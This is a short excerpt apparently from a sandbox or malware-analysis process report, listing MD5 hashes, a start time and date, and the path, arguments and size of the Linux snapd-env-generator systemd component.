                                                                                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                          File size:22760 bytes
                                                                                                                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e